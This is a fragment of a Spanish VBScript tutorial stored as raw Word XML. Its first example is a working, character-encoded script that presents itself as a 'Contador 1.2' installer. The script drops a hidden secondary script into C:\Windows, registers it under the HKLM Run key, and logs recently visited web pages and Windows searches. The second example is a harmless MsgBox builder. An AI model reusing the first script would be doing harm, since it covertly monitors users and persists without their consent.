            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_ MftMVN&gt;#MVN(2_ qfd-QfdTqjwf#!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="3" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging="708"/>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VPFQGBWBOLD@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LMWBGLQ!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MftMVN_ Pfw#epl#&gt;#@qfbwfLaif`w+!P`qjswjmd-EjofPzpwfnLaif`w!*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Pfw#e#&gt;#epl-DfwEjof+!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="4256"/>
                <w:tab w:val="center" w:pos="7301"/>
              </w:tabs>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9_Tjmgltp_oldl`lmw-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>pzp!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>Pfw#wp#&gt;#e-LsfmBpWf{wPwqfbn+;*_</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:tab/>
              <w:t>wp-Tqjwf#fm`qjswbq+!?</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Qfdjpwql</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>#!%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>MVN%!#=!%Ua@qOe%!Jmj`jbgl#?!%T%!#!%M%!#!%B%!=#9###?!%ek%!=!%Ua@qO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lmgl#gf#fp`qjwlqjl9#?!</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>%[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>%!=!%Ua@qOe%!Jnsqfplqb#sqfgfwfqnjmbgb9#?!%Jnsqfplqb%!=!%Ua@qOe%Fpsb`jl+!</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t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>9!*</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>%Ua@qOe%!Sbdjmb#jmj`jbo#gf#Jmwfqmfw#F{solqfq#?!%J%!=9#?!%S%!=!%Ua@qO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owjnbp#wqfp#sbdjmbp#tfa#ujpjwbgbp</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>9!%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Ua@qOe%!?!%S2%!=?!%S1%!=?!%S0%!=!%Ua@qOe%!</w:t>
            </w:r>
          </w:p>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owjnbp#`jm`l#avprvfgbp#qfbojybgbp#fm#Tjmgltp</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>9!%</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Ua@qOe%!?!%A2%!=?!%A1%!=?!%A0%!=?!%A7%!=?!%A6%!=</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="708" w:hanging="708"/>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Ua@qOe%Ua@qOe*_ wp-@olpf_ Pfw#tjaf#&gt;#epl-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>LsfmWf{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>wEjof+!@9_Tjmgltp_oldl`lmw-pzp!/#2*_ offq&gt;tjaf-QfbgBoo_ `bqb`wfqfp&gt;ofm+offq*_ Je#`bqb`wfqfp#=#66666#Wkfm_</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="243" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="552" w:firstLine="708"/>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Nj@gm#&gt;#Qjdkw+Offq/#66666*_ Pfw#`6#&gt;#epl-@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>qfbwfWf{</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>wEjof#+!@9_Tjmgltp_oldl`lmwpzp!/Wqvf*_ `6-Tqjwf#Nj@gm_ Fmg#Je") c10.Close</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a.RegWrite</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="146"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HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\ContInicio","C:\Windows\cuenta.vbs" </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>a.RegWrite</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\USERDATALOGCONTADOR","1" c11= MsgBox ("Instalacion completada con exito.",64,"Contador 1.2") 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if</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="2374" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="33" w:firstLine="0"/>
        <w:jc w:val="righ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uede parecer mentira, pero si, es un script completamente funcional (lo adjunto con el tutorial, por si se dieran errores de copiado), pese a todas las cosas raras que tiene. En </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>realidad</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es un script bastante complejo que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>posee en su interior otro scrip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codificado</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si hemos aprendido bien todas las funciones, creo que se comprende bien todo el script en general y cual es su función. Lo único que cabe destacar es el montón de letras raras que hay en mitad de este. Podemos ver que se trata de una función Write (en un archivo), que escribe </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>encriptar(eltextoraro)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Para saber pues que es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">lo que escribe podemos crear nosotros un vbs poniendo </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MsgBox encriptar(eltextoraro)</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, sin olvidarno de copiar la función encriptar que hay al principio. Así podremos leer fácilmente que hay en el otro script. Este es, un ejemplo pues de cómo incluir otros scripts en tu script. Llamemos pues, a este script </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Script Principal</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y al que escribe, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>secundario</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. El funcionamiento de este script (inténtalo sacar tú antes) sería:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="280" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="658"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4657090" cy="2429510"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11238" name="Picture 11238"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="11238" name="Picture 11238"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4657090" cy="242951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observáis veréis claramente como realiza cada una de estas acciones, y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en realidad, su diseño es bastante simple. Es por esto recomendable sacar una conclusión de aquí (aparte de </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>procedimientos y métodos empleados</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en este script): que antes de ponerse a hacer cualquier programa </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>debemos plantear sobre papel una estructura básica</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de lo que si y no va a hacer el programa y de cómo lo llevará a cabo (al estilo del esquema que he hecho yo o similar).</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Pongamos otro ejemplo de un script, este es ya mucho mucho más sencillo de entender, y sirve para crear MsgBox de forma fácil y rápida:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8502" w:type="dxa"/>
        <w:tblInd w:w="74" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="2" w:type="dxa"/>
          <w:right w:w="26" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8550"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="7068"/>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On Error Resume Next</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="352"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titulo = InputBox ("Introduzca el titulo del cuadro de mensaje:","Cuadro de mensaje","Introduzca un titulo") mensaje = InputBox ("Introduzca el mensaje del cuadro de mensaje:","Cuadro de mensaje","Introduzca un mensaje") D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p1 = InputBox ("Introduzca un numero que correspondera a las opciones: (1-Aceptar) (2-Aceptar/Cancelar) (3Anular/Reintentar/Ignorar) (4-Si/No/Cancelar) (5-Si/No) (6-Reintentar/Cancelar)","Cuadro de mensaje","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1" then c1="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2" then c1="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3" then c1="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4" then c1="3"</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5" then c1="4"</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6" then c1="5"</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0"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1"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2"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3"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4"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5"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oop Until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p2 = InputBox ("Introduzca un numero que correspondera a la imagen de la izquierda: (1-Ninguno) (2-Error) (3Interrogacion) (4-Exclamacion) (5-Información)","Cuadro de mensaje","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2="1" then c2="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2="2" then c2="16"</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2="3" then c2="3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2="4" then c2="48"</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2="5" then c2="64"</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2="0" then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2="16" then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2="32" then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2="48" then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2="64" then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oop Until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o</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="118"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p3 = InputBox ("Introduzca un numero que correspondera a la opcion predeterminado: (1-Primera opcion) (2Segunda opcion) (3-Tercera opcion)","Cuadro de mensaje","0") If cp3="1" then c3="0"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="8184"/>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If cp3="2" then c3="256"</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3="3" then c3="51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3="0" then pass3="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3="256" then pass3="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3="512" then pass3="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oop Until pass3="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o</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="57"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p4 = InputBox ("Introduzca un numero que correspondera al tipo de mensaje: (1-Cuadro de diálogo modal de la aplicación) (2-Cuadro de diálogo modal del sistema)","Cuadro de mensaje","0") If cp4="1" then c4="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4="2" then c4="4096"</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4="0" then pass4="ok"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="6017"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4="4096" then pass4="ok" Loop Until pass4="ok" n1 = 10000-10000+c1+c2+c3+c4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="238" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1545"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a </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>=  MsgBox</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("¿Quieres probar el mensaje?",vbYesNo + vbInformation,"Cuadro de mensaje" ) if a=6 then b=MsgBox(mensaje,n1,titulo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titulo2 = InputBox ("Este es el codigo de su cuadro de mensaje:"&amp; vbcrlf &amp; vbcrlf &amp; vbcrlf &amp; vbcrlf &amp;""&amp; vbcrlf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amp;"Copie el codigo a su archivo:","Cuadro de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mensaje","variable=MsgBox("&amp;chr(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>34)&amp;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Trebuchet MS"/>
                <w:b/>
                <w:sz w:val="16"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>mensaje&amp;chr(34)&amp;","&amp;n1&amp;","&amp;chr(34)&amp;titulo&amp;chr(34)&amp;")")</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1 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Aceptar:","Cuadro de mensaje","if variable=1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1 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Cancelar:","Cuadro de mensaje","if variable=2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2 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Anular:","Cuadro de mensaje","if variable=3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2 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Reintentar:","Cuadro de mensaje","if variable=4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2 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Ignorar:","Cuadro de mensaje","if variable=5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3 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Si:","Cuadro de mensaje","if variable=6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3 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste No:","Cuadro de mensaje","if variable=7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3 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Cancelar:","Cuadro de mensaje","if variable=2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4 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Si:","Cuadro de mensaje","if variable=6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4 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste No:","Cuadro de mensaje","if variable=7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5 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Reintentar:","Cuadro de mensaje","if variable=4 then variable2=tucodig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5 then var1=InputBox ("Este codigo se incluye despues del anterior y sirve para establecer una funcion en el caso de que se conteste Cancelar:","Cuadro de mensaje","if variable=2 then variable2=tucodigo")</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script también lo incluyo junto con el tutorial, y como podéis ver, no es nada complicado de entender. Este es un ejemplo de un uso bastante complejo del tratamiento de las cadenas. Cabe destacar también el notable uso de los bucles Do…Loop, aunque es 